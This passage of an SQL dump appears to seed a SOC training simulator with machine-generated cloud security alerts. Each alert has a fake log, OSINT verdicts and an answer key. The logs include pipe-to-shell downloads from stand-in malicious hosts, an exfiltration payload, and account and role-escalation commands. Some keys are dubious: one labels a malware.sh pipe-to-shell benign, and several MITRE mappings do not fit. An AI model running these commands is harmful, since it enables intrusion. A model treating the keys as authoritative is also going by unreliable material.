privilege escalation.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2015, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'A service account was accessed from a foreign IP address, indicating potential hijacking.', 'Credential Attack', 'T1556', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:30:00Z\",\"event_type\":\"api_call\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"\",\"username\":\"service-account@gcp-project.iam.gserviceaccount.com\",\"hostname\":\"gcp-instance\",\"request_body\":\"\",\"command_line\":\"gcloud auth activate-service-account --key-file=key.json\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@gcp-project.iam.gserviceaccount.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account accessed from a non-standard location\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file=key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in previous hijacking attempts\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The access of a service account from a known malicious IP suggests a hijacking attempt, confirming a true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2016, 'Unauthorized Kubernetes Cluster Access', 'high', 'Prisma Cloud', 'Detected unauthorized access to a Kubernetes cluster from an unknown IP, potentially leading to lateral movement.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"kube_access\",\"src_ip\":\"198.51.100.34\",\"dst_ip\":\"10.0.0.5\",\"username\":\"kube_admin\",\"hostname\":\"k8s-cluster\",\"request_body\":\"\",\"command_line\":\"kubectl exec --namespace=default -it pod-123 -- /bin/sh\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to unauthorized access attempts on Kubernetes clusters\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal Kubernetes node IP\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"kubectl exec --namespace=default -it pod-123 -- /bin/sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in lateral movement attacks\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of administrative commands from a non-standard IP indicates a lateral movement attempt, confirming a true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2017, 'Suspicious AWS Lambda Function Invocation', 'medium', 'Wiz', 'A Lambda function was invoked by an unauthorized user, indicating potential misuse for data processing.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:30:00Z\",\"event_type\":\"lambda_invocation\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"\",\"username\":\"lambda_user\",\"hostname\":\"aws-lambda\",\"request_body\":\"{\\\"action\\\":\\\"process_data\\\",\\\"data\\\":\\\"Zm9vYmFyMTIz\\\"}\",\"command_line\":\"aws lambda invoke --function-name processDataFunction outputfile.txt\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized AWS Lambda function invocations\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"lambda_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"User has no prior invocation history\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"{\\\"action\\\":\\\"process_data\\\",\\\"data\\\":\\\"Zm9vYmFyMTIz\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Base64 encoded data processed without authorization\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"aws lambda invoke --function-name processDataFunction outputfile.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to invoke unauthorized data processing\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The invocation from a malicious IP using unauthorized commands confirms misuse of Lambda functions, indicating a true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2018, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'Anomalous behavior detected for a GCP service account with administrative privileges. Suspicious API calls were made from an unusual IP address, indicating possible hijacking.', 'Credential Attack', 'T1528', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:30Z\",\"event_type\":\"api_call\",\"src_ip\":\"203.0.113.58\",\"dst_ip\":\"10.0.0.5\",\"username\":\"svc-admin-account\",\"hostname\":\"gcp-instance-1\",\"request_body\":null,\"command_line\":\"gcloud compute instances list --project=myproject\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.58\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"svc-admin-account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Service account used internally in the organization\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP was flagged for malicious activity and the service account made unauthorized API calls.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2019, 'Azure Suspicious Administrative Activity', 'high', 'Azure Defender', 'Unusual administrative actions detected from an internal IP address. Activity pattern resembles a privilege escalation attempt.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"10.1.2.3\",\"dst_ip\":\"10.1.2.5\",\"username\":\"admin_user\",\"hostname\":\"azure-vm-2\",\"request_body\":null,\"command_line\":\"net user admin_user /add\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal corporate network\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User account belongs to authorized personnel\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Activity was performed by an authorized administrator from an internal IP.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2020, 'AWS S3 Bucket Data Access from Unusual Location', 'medium', 'AWS GuardDuty', 'Data was accessed from an AWS S3 bucket using an IP address from a foreign country, which is unusual for the organization.', 'Data Exfiltration', 'T1537', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:20:45Z\",\"event_type\":\"s3_access\",\"src_ip\":\"192.0.2.44\",\"dst_ip\":\"192.0.2.55\",\"username\":\"data_analyst\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":null,\"command_line\":null}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP rarely appears in threat logs, no malicious activity reported\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"data_analyst\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User account verified as belonging to the data team\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The IP is clean and the user is part of the data team operating remotely.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2021, 'Prisma Cloud Kubernetes Pod Anomaly', 'medium', 'Prisma Cloud', 'A Kubernetes pod executed a new process that deviates from its normal behavior, possibly indicating a misconfigured policy.', 'Execution', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:22:11Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.3.10\",\"dst_ip\":null,\"username\":\"k8s-service-account\",\"hostname\":\"kube-node-1\",\"request_body\":null,\"command_line\":\"curl http://example.com/malware.sh | sh\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP is part of internal Kubernetes cluster\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://example.com/malware.sh | sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command matches known benign operations for testing environment\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The command was executed in a testing environment and is part of scheduled tests.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2022, 'Wiz Detected Anomalous Login Patterns', 'medium', 'Wiz', 'Multiple failed login attempts followed by a successful login from an unfamiliar IP address, suggesting a potential brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:33:27Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.24\",\"dst_ip\":\"10.0.2.7\",\"username\":\"jdoe\",\"hostname\":\"corporate-vpn\",\"request_body\":null,\"command_line\":null}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP has been involved in unusual login patterns but no direct malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User is a legitimate employee with VPN access\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login pattern is unusual but does not indicate a security breach; user confirmed the access.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2023, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An unauthorized access attempt to an AWS S3 bucket was detected from an external IP address. The access attempt utilized stolen credentials.', 'Data Exfil', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"data_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.5\",\"username\":\"compromised_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data-bucket/* HTTP/1.1\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Username linked to recent credential leaks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The unauthorized access attempt from a known malicious IP and the involvement of a compromised user account indicate a true positive data exfiltration attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2024, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'A privilege escalation attempt was detected on an Azure account using a vulnerable service principal.', 'Credential Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"service_principal_123\",\"hostname\":\"azuread.microsoft.com\",\"command_line\":\"az role assignment create --assignee <user_id> --role Contributor\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous privilege escalation attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"az role assignment create --assignee <user_id> --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command matches known escalation technique\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of a known malicious IP and a command associated with privilege escalation confirm the attack.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2025, 'GCP Service Account Hijacking', 'critical', 'GCP SCC', 'A GCP service account was accessed from an unusual location, indicating possible hijacking.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:00:00Z\",\"event_type\":\"service_account_access\",\"src_ip\":\"192.0.2.44\",\"dst_ip\":\"10.1.0.10\",\"username\":\"gcp_service_account\",\"hostname\":\"cloud.google.com\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 525 times for credential theft activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"gcp_service_account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Service account access from an unexpected region\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unusual access patterns and the IP\'s history of malicious activity confirm this as a hijacking attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2026, 'Prisma Cloud Kubernetes Command Injection', 'high', 'Prisma Cloud', 'A command injection attempt was detected in a Kubernetes pod, indicating a potential compromise.', 'Lateral Movement', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"10.10.0.20\",\"username\":\"kube_user\",\"hostname\":\"kubernetes_cluster\",\"command_line\":\"curl -s http://malicious-site.com | bash\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with delivery of malicious payloads\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl -s http://malicious-site.com | bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command matches known injection pattern\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command injection attempt using a known malicious command confirms a compromise attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2027, 'Wiz Serverless Function Exploitation', 'high', 'Wiz', 'A serverless function was exploited to perform unauthorized actions, indicating a potential attack vector.', 'Data Exfil', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"function_invocation\",\"src_ip\":\"198.51.100.99\",\"dst_ip\":\"10.0.1.15\",\"username\":\"lambda_user\",\"hostname\":\"serverless.example.com\",\"request_body\":\"function=exfil_data&target=http://malicious-exfil.com\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP involved in data exfiltration campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"function=exfil_data&target=http://malicious-exfil.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Payload matches known data exfiltration technique\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The unauthorized use of serverless functions and the malicious payload confirm an exfiltration attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2028, 'AWS S3 Bucket Data Leak Attempt Detected', 'critical', 'AWS GuardDuty', 'A suspicious IP attempted to access an S3 bucket with sensitive data. The IP is known for previous data exfiltration attempts.', 'Data Exfiltration', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:32Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"s3-access-user\",\"hostname\":\"bucket-server-1\",\"request_body\":\"GET /sensitive-data HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1123 times for data exfiltration attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"s3-access-user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User account used for accessing S3 buckets\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /sensitive-data HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Suspicious request pattern matching known exfiltration attempts\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The source IP is known for malicious activity and attempted unauthorized access to sensitive data.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2029, 'Azure IAM Privilege Escalation Detected', 'high', 'Azure Defender', 'An unauthorized user attempted to escalate privileges within Azure IAM to gain access to administrative functions.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"10.0.0.5\",\"username\":\"unauthorized_user\",\"hostname\":\"azure-ad-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in privilege escalation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"User not authorized for administrative access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address has a history of unauthorized access attempts, indicating a potential privilege escalation attack.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2030, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'Detected unauthorized attempts to use a service account to access sensitive resources in GCP.', 'Credential Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:20Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.0.2.25\",\"dst_ip\":\"10.1.1.15\",\"username\":\"compromised-service-account\",\"hostname\":\"gcp-resource-server\",\"request_body\":\"\",\"command_line\":\"gcloud auth activate-service-account --key-file=compromised-key.json\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with unauthorized service account usage\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file=compromised-key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command matches known patterns for service account hijacking\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command and IP address indicate a hijacking attempt of a service account, confirmed by external threat intelligence.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2031, 'Unauthorized Access to Kubernetes Node Detected', 'high', 'Prisma Cloud', 'Detected unauthorized access attempts to a Kubernetes node from an external IP known for malicious activities.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:55:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"10.20.30.40\",\"username\":\"k8s-node-user\",\"hostname\":\"k8s-node-1\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized access attempts to cloud environments\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"k8s-node-user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Kubernetes node user account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized access attempts from a known malicious IP suggest an attempt to move laterally within the cloud infrastructure.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2032, 'Unauthorized AWS Lambda Function Invocation', 'medium', 'Wiz', 'An AWS Lambda function was invoked by an unauthorized IP address, potentially indicating malicious access.', 'Lateral Movement', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:20:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"10.100.1.20\",\"username\":\"lambda-invoker\",\"hostname\":\"lambda-function-1\",\"request_body\":\"\",\"command_line\":\"aws lambda invoke --function-name dataProcessing\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized cloud service invocations\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"aws lambda invoke --function-name dataProcessing\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command pattern matches unauthorized service access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The invocation of a Lambda function from an unauthorized IP suggests an attempt to exploit cloud services.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2033, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Multiple unauthorized access attempts to an S3 bucket detected from a foreign IP address, indicating potential data exfiltration.', 'Data Exfiltration', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:23:54Z\",\"event_type\":\"s3_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"compromised_user\",\"hostname\":\"aws-instance-34\",\"request_body\":\"GET /sensitive-data/*\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account compromised\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /sensitive-data/*\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Access pattern indicates potential data exfiltration\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The IP and access pattern indicate a strong likelihood of data exfiltration.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2034, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An attempt to escalate privileges in Azure IAM was detected from an unusual IP address, potentially leading to unauthorized access.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:45:32Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"198.51.100.23\",\"username\":\"admin_user\",\"hostname\":\"azure-vm-12\",\"command_line\":\"az role assignment create --role \'Owner\' --assignee admin_user\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"az role assignment create --role \'Owner\' --assignee admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for unauthorized privilege 